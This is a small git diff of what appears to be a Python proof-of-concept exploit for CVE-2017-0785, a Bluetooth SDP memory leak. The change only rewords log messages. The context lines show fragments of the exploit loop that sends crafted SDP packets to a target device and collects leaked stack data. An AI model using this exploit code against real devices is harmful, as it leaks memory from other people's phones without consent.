diff options
Diffstat (limited to 'main.py')
-rw-r--r-- | main.py | 6 |
1 files changed, 3 insertions, 3 deletions
@@ -2,7 +2,7 @@ from pwn import * import bluetooth if not 'TARGET' in args: - log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX") + log.info("Atleast Correctly USE it") exit() target = args['TARGET'] @@ -35,12 +35,12 @@ sock.send(packet(service_long, '\x00')) data = sock.recv(mtu) if data[-3] != '\x02': - log.error('Invalid continuation state received.') + log.error('It did not work.') stack = '' for i in range(1, n): - p.status('Sending packet %d' % i) + p.status('Doing Work %d' % i) sock.send(packet(service_short, data[-3:])) data = sock.recv(mtu) stack += data[9:-3] |